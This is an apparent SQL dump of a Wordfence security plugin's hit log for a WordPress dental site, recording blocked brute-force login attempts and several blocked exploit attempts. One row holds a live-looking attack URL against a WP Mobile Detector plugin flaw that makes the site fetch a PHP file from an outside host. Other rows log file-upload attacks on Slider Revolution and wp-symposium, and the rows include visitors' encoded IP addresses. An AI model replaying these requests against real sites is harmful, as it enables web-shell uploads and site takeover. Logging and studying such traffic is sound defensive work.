(4970, 1595039482.501116, 1595039482.451300, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4971, 1595039482.468037, 1595039482.419700, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4972, 1595039482.467443, 1595039482.418900, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4973, 1595039482.456396, 1595039482.407500, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4974, 1595039482.417383, 1595039482.363800, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4975, 1595039482.416526, 1595039482.363400, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4976, 1595039482.404186, 1595039482.354000, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4977, 1595039482.360811, 1595039482.314200, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4978, 1595039482.345998, 1595039482.293800, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4979, 0.000000, 1595042230.616766, 0x00000000000000000000ffffb956a466, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4980, 0.000000, 1595059663.401878, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4981, 0.000000, 1595062221.675750, 0x00000000000000000000ffff23bde3df, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://affordable-plumber.com.au/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4982, 0.000000, 1595072007.685436, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4983, 0.000000, 1595073030.473840, 0x00000000000000000000ffff72688dda, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://gamepub.rs/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4984, 0.000000, 1595077689.420554, 0x00000000000000000000ffffb956a465, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4985, 0.000000, 1595090256.190146, 0x00000000000000000000ffffb956a46a, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4986, 0.000000, 1595096399.308974, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4987, 0.000000, 1595096816.151818, 0x00000000000000000000ffff25e023b1, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://musikcorps-bickenbach.de/administrator/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'loginFailInvalidUsername', NULL, NULL),
(4988, 0.000000, 1595107422.168736, 0x00000000000000000000ffff4df7b5a2, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4989, 0.000000, 1595108346.360629, 0x00000000000000000000ffffb956a46a, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4990, 0.000000, 1595124168.109891, 0x00000000000000000000ffff3ed2b2e5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4991, 1595126355.100745, 1595126355.027200, 0x00000000000000000000ffffd9a0ff5b, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-admin/admin-ajax.php', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Slider Revolution: Arbitrary File Upload', '{\"learningMode\":0,\"failedRules\":\"60\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),
(4992, 0.000000, 1595136100.186784, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4993, 0.000000, 1595137410.842798, 0x00000000000000000000ffffb955bfc4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4994, 0.000000, 1595138856.576112, 0x00000000000000000000ffff1fdc0283, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4995, 0.000000, 1595150554.033294, 0x00000000000000000000ffff505240d5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://cubscouts.org/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4996, 0.000000, 1595151045.145598, 0x00000000000000000000ffffb956a464, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4997, 0.000000, 1595154803.994105, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4998, 0.000000, 1595167202.745711, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4999, 0.000000, 1595176388.018680, 0x00000000000000000000ffffb956a46a, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5000, 0.000000, 1595191247.258016, 0x00000000000000000000ffff2241c7e4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://punishedbratsblog.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5001, 0.000000, 1595196769.772740, 0x00000000000000000000ffff689b690d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://sandraowencreative.com/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5002, 0.000000, 1595202054.594366, 0x00000000000000000000ffffb956a46d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5003, 0.000000, 1595205803.532863, 0x00000000000000000000ffffab19c119, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5004, 0.000000, 1595213366.413204, 0x00000000000000000000ffff689b690d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.appartements-gahler.de/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5005, 0.000000, 1595213937.143397, 0x00000000000000000000ffffd4538813, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5006, 0.000000, 1595216480.746393, 0x00000000000000000000ffffb956a462, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5007, 0.000000, 1595219194.591077, 0x00000000000000000000ffff689b690d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://givinguwsp.org/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5008, 0.000000, 1595220063.342737, 0x00000000000000000000ffffb977510b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5009, 0.000000, 1595229821.838194, 0x00000000000000000000ffff23e4cc33, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://heirsearch.com/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5010, 0.000000, 1595234921.607869, 0x00000000000000000000ffffb956a465, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5011, 0.000000, 1595238304.379690, 0x00000000000000000000ffffb955be84, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5012, 0.000000, 1595245801.126845, 0x00000000000000000000ffffb9dc658e, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5013, 0.000000, 1595250847.643851, 0x00000000000000000000ffff225b437b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://monex.ru/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5014, 0.000000, 1595261663.906215, 0x00000000000000000000ffff225b437b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://freightshiptravel.com/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5015, 0.000000, 1595265957.982617, 0x00000000000000000000ffffc39a292a, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5016, 0.000000, 1595267856.446662, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5017, 0.000000, 1595269521.240616, 0x00000000000000000000ffffb956a704, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5018, 0.000000, 1595271015.854330, 0x00000000000000000000ffff23e41915, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://kicad-kicon.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5019, 0.000000, 1595275814.877347, 0x00000000000000000000ffff689b690d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://mailisin.com/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5020, 0.000000, 1595286856.034276, 0x00000000000000000000ffffb956a46a, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5021, 0.000000, 1595291858.360040, 0x00000000000000000000ffff225b437b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://visibileweb.com/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5022, 0.000000, 1595293951.821058, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5023, 0.000000, 1595297560.241942, 0x00000000000000000000ffff23e4cc33, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://2019sotu.org/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5024, 0.000000, 1595304644.297512, 0x00000000000000000000ffffb956a46d, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5025, 0.000000, 1595310002.545993, 0x00000000000000000000ffff23e04920, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://colinconcreteenterprise.com/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5026, 0.000000, 1595316108.988514, 0x00000000000000000000ffffb956a466, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5027, 0.000000, 1595322353.031544, 0x00000000000000000000ffffb977510b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5028, 0.000000, 1595325606.579427, 0x00000000000000000000ffff452e2414, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/?_wfsf=detectProxy', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1', 'scan:detectproxy', NULL, NULL),
(5029, 0.000000, 1595330303.710626, 0x00000000000000000000ffff23bd67a0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://aeraconseil.com/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5030, 0.000000, 1595333798.009932, 0x00000000000000000000ffffb955ef6e, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5031, 0.000000, 1595336188.601188, 0x00000000000000000000ffff23e44751, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://dzwigichelm.pl/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5032, 0.000000, 1595340477.347983, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5033, 0.000000, 1595348336.443692, 0x00000000000000000000ffff654baaf8, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://house-entourage.ru/administrator/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5034, 0.000000, 1595352319.359647, 0x00000000000000000000ffffb9560dd5, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5035, 0.000000, 1595354729.165472, 0x00000000000000000000ffff96810820, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5036, 0.000000, 1595358747.864385, 0x00000000000000000000ffffb955bfc9, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5037, 0.000000, 1595361264.258680, 0x00000000000000000000ffff225b437b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.collectif3a.org/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5038, 1595365133.227049, 1595365133.152300, 0x00000000000000000000ffff0d484abb, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/wp-mobile-detector/resize.php?src=http%3A%2F%2Fwww.relationshiptips.club%2Fcache%2Fdb.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'WP Mobile Detector <= 3.5 - Arbitrary File Upload', '{\"learningMode\":0,\"failedRules\":\"36\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tb2JpbGUtZGV0ZWN0b3IvcmVzaXplLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tb2JpbGUtZGV0ZWN0b3IvcmVzaXplLnBocA==\",\"category\":\"file_upload\",\"ssl\":0}'),
(5039, 1595365137.971570, 1595365137.776700, 0x00000000000000000000ffff0d484abb, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-content/plugins/wp-symposium/server/php/index.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32', 'blocked:waf', 'Malicious File Upload', '{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbZmlsZXNdWzBd\",\"paramValue\":\"Y2NnUG9zWVYucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zeW1wb3NpdW0vc2VydmVyL3BocC9pbmRleC5waHA=\",\"category\":\"file_upload\",\"ssl\":0}'),
